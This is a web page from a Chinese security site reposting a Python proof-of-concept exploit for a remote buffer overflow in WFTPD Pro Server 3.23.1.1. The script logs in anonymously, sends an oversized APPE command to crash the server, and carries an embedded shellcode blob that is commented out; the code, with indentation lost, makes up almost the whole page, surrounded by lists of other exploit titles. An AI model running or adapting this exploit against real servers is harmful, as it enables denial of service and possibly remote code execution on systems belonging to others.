首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC
来源:vfocus.net 作者:Joxean 发布时间:2006-11-08  

#!/usr/bin/env python

import sys
import struct
import ftplib

print "WFTPD Pro Server 3.23.1.1 Buffer Overflow (Only a DOS currently, simple POC)"
print "Copyright (c) Joxean Koret"
print

target = "192.168.1.13"
targetPort = "21"

try:
ftp = ftplib.FTP()

print "[+] Connecting to target "
msg = ftp.connect(target, targetPort)
print "[+] Ok. Target banner"
print msg
print
print "[+] Trying to logging anonymously"
msg = ftp.login() # Anonymous
print "[+] Ok. Message"
print msg
print
except:
print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
sys.exit(0)


a = "\\\\A:"

for i in range(6):
a += a

print "[+] Padding length " + str(len(a)) + " bytes"

b = "ABCD"

for i in range(4):
b += b

a = a + "ABCD"*10 + b

shellCode = ""
shellCode += "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
shellCode += "\x9b\x26\x8c\x83\xeb\xfc\xe2\xf4\x10\xf1\xcd\xc1\x04\x62\xd9\x73"
shellCode += "\x13\xfb\xad\xe0\xc8\xbf\xad\xc9\xd0\x10\x5a\x89\x94\x9a\xc9\x07"
shellCode += "\xa3\x83\xad\xd3\xcc\x9a\xcd\xc5\x67\xaf\xad\x8d\x02\xaa\xe6\x15"
shellCode += "\x40\x1f\xe6\xf8\xeb\x5a\xec\x81\xed\x59\xcd\x78\xd7\xcf\x02\xa4"
shellCode += "\x99\x7e\xad\xd3\xc8\x9a\xcd\xea\x67\x97\x6d\x07\xb3\x87\x27\x67"
shellCode += "\xef\xb7\xad\x05\x80\xbf\x3a\xed\x2f\xaa\xfd\xe8\x67\xd8\x16\x07"
shellCode += "\xac\x97\xad\xfc\xf0\x36\xad\xcc\xe4\xc5\x4e\x02\xa2\x95\xca\xdc"
shellCode += "\x13\x4d\x40\xdf\x8a\xf3\x15\xbe\x84\xec\x55\xbe\xb3\xcf\xd9\x5c"
shellCode += "\x84\x50\xcb\x70\xd7\xcb\xd9\x5a\xb3\x12\xc3\xea\x6d\x76\x2e\x8e"
shellCode += "\xb9\xf1\x24\x73\x3c\xf3\xff\x85\x19\x36\x71\x73\x3a\xc8\x75\xdf"
shellCode += "\xbf\xc8\x65\xdf\xaf\xc8\xd9\x5c\x8a\xf3\x37\xd0\x8a\xc8\xaf\x6d"
shellCode += "\x79\xf3\x82\x96\x9c\x5c\x71\x73\x3a\xf1\x36\xdd\xb9\x64\xf6\xe4"
shellCode += "\x48\x36\x08\x65\xbb\x64\xf0\xdf\xb9\x64\xf6\xe4\x09\xd2\xa0\xc5"
shellCode += "\xbb\x64\xf0\xdc\xb8\xcf\x73\x73\x3c\x08\x4e\x6b\x95\x5d\x5f\xdb"
shellCode += "\x13\x4d\x73\x73\x3c\xfd\x4c\xe8\x8a\xf3\x45\xe1\x65\x7e\x4c\xdc"
shellCode += "\xb5\xb2\xea\x05\x0b\xf1\x62\x05\x0e\xaa\xe6\x7f\x46\x65\x64\xa1"
shellCode += "\x12\xd9\x0a\x1f\x61\xe1\x1e\x27\x47\x30\x4e\xfe\x12\x28\x30\x73"
shellCode += "\x99\xdf\xd9\x5a\xb7\xcc\x74\xdd\xbd\xca\x4c\x8d\xbd\xca\x73\xdd"
shellCode += "\x13\x4b\x4e\x21\x35\x9e\xe8\xdf\x13\x4d\x4c\x73\x13\xac\xd9\x5c"
shellCode += "\x67\xcc\xda\x0f\x28\xff\xd9\x5a\xbe\x64\xf6\xe4\x1c\x11\x22\xd3"
shellCode += "\xbf\x64\xf0\x73\x3c\x9b\x26\x8c"

a = a + "JOXEAN" #+ shellCode

print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "

try:
msg = ftp.sendcmd("APPE " + a)
print "[!] Exploit doesn't work [" + msg + "]"
except:
print "[+] Exploit apparently works. Trying to verify it ... "

try:
ftp.connect(target, targetPort)
print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
except:
print "[!] Ok. Server is dead, exploit successfully executed. "



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WarFTPd 1.82.00-RC11 Remote De
·Xcode OpenBase <= 10.0.0 (s
·iPrimal Forums (admin/index.ph
·Xcode OpenBase <= 10.0.0 (u
·OpenLDAP 2.2.29 Remote Denial
·MS Internet Explorer 6/7 (XML
·Omni-NFS Server 5.2 (nfsd.exe)
·AspPired2Poll <= 1.0 (MoreI
·MS Windows (Windows Kernel) Pr
·phpwcms <= 1.2.6 (Cookie: w
·Netref 4 (cat_for_aff.php) Sou
·PHPWind <= 5.0.1 (AdminUser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved